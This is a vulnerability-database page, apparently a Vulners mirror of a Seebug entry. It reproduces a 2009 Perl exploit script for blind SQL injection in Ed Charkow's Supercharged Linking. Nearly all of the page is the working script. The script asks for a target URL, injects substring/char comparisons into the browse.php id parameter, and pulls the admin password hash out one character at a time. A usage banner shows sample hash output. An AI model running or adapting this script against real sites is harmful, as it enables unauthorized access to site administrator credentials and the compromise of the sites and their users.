Lucene search
K

Ed Charkow's Supercharged Linking Blind SQL Injection Exploit

🗓️ 25 Aug 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 8 Views

Ed Charkow's Supercharged Linking Blind SQL Injection Exploit. Perl script for exploiting SQL injection in Ed Charkow's Supercharged Linking software. Author: NoGe. Contact: noge[dot]code[at]gmail[dot]com

Code

                                                #!/usr/bin/perl

#==========================================================================================#
#                                                                                          #
# [o] Ed Charkow's Supercharged Linking Blind SQL Injection Exploit                        #
#      Software   : Ed Charkow's Supercharged Linking                                      #
#      Buy Script : http://www.infodepot3000.com/Scripts/content/supercharged_linking.html #
#      Author     : NoGe                                                                   #
#      Contact    : noge[dot]code[at]gmail[dot]com                                         #
#      Blog       : http://evilc0de.blogspot.com                                           #
#                                                                                          #
# [o] Usage                                                                                #
#      root@noge:~# perl link.pl                                                           #
#                                                                                          #
#      [x]============================================================[x]                  #
#       | Ed Charkows Supercharged Linking Blind SQL Injection Exploit |                   #
#       |              [F]ound by NoGe [C]oded by Vrs-hCk              |                   #
#      [x]============================================================[x]                  #
#                                                                                          #
#      [+] URL Path : www.target.com/[path]                                                #
#      [+] Valid ID : 1                                                                    #
#                                                                                          #
#      [!] Exploiting http://www.target.com/[path]/ ...                                    #
#                                                                                          #
#      [+] SELECT password FROM admin LIMIT 0,1 ...                                        #
#      [+] md5@password> de9e3ae793d300ce7ee4742d4513cb06                                  #
#                                                                                          #
#      [!] Exploit completed.                                                              #
#                                                                                          #
#      root@noge:~#                                                                        #
#                                                                                          #
# [o] Greetz                                                                               #
#      MainHack BrotherHood [ http://mainhack.net ]                                        #
#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe                                 #
#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella                                   #
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke                                       #
#                                                                                          #
#==========================================================================================#

use HTTP::Request;
use LWP::UserAgent;

$cmsapp = 'crotz';
$vuln   = 'browse.php?id=';
$table  = 'admin';
$column = 'password';
$regexp = "No links for this category could be found";
$maxlen = 32;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
                              $cmsapp
 [x]============================================================[x]
  | Ed Charkows Supercharged Linking Blind SQL Injection Exploit |
  |              [F]ound by NoGe [C]oded by Vrs-hCk              |
 [x]============================================================[x]

\n";

print "\n [+] URL Path : "; chomp($web=<STDIN>);
print " [+] Valid ID : "; chomp($id=<STDIN>);

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";

sub get_data() {
	print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
	syswrite(STDOUT, " [+] md5\@password> ", 20);
	for (my $i=1; $i<=$maxlen; $i++) {
		my $chr = 0;
		my $found = 0;
		my $char = 48;
		while (!$chr && $char<=57) {
			if(exploit($i,$char) !~ /$regexp/) {
				$chr = 1;
				$found = 1;
				syswrite(STDOUT,chr($char),1);
			} else { $found = 0; }
			$char++;
		}
		if(!$chr) {
			$char = 97;
			while(!$chr && $char<=122) {
				if(exploit($i,$char) !~ /$regexp/) {
					$chr = 1;
					$found = 1;
					syswrite(STDOUT,chr($char),1);
				} else { $found = 0; }
				$char++;
			}
		}
		if (!$found) {
			print "\n\n [!] Exploit completed.\n\n";
			exit;
		}
	}
}

sub exploit() {
	my $limit = $_[0];
	my $chars = $_[1];
	my $blind = '+and+substring((select+'.$column.'+from+'.$table.'+limit+0,1),'.$limit.',1)=char('.$chars.')';
	my $inject = $target.$vuln.$id.$blind;
	my $content = get_content($inject);
	return $content;
}

sub get_content() {
	my $url = $_[0];
	my $req = HTTP::Request->new(GET => $url);
	my $ua  = LWP::UserAgent->new();
	$ua->timeout(5);
	my $res = $ua->request($req);
	if ($res->is_error){
		print "\n\n [!] Error, ".$res->status_line.".\n\n";
		exit;
	}
	return $res->content;
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2009 00:00Current
7.1High risk
Vulners AI Score7.1
8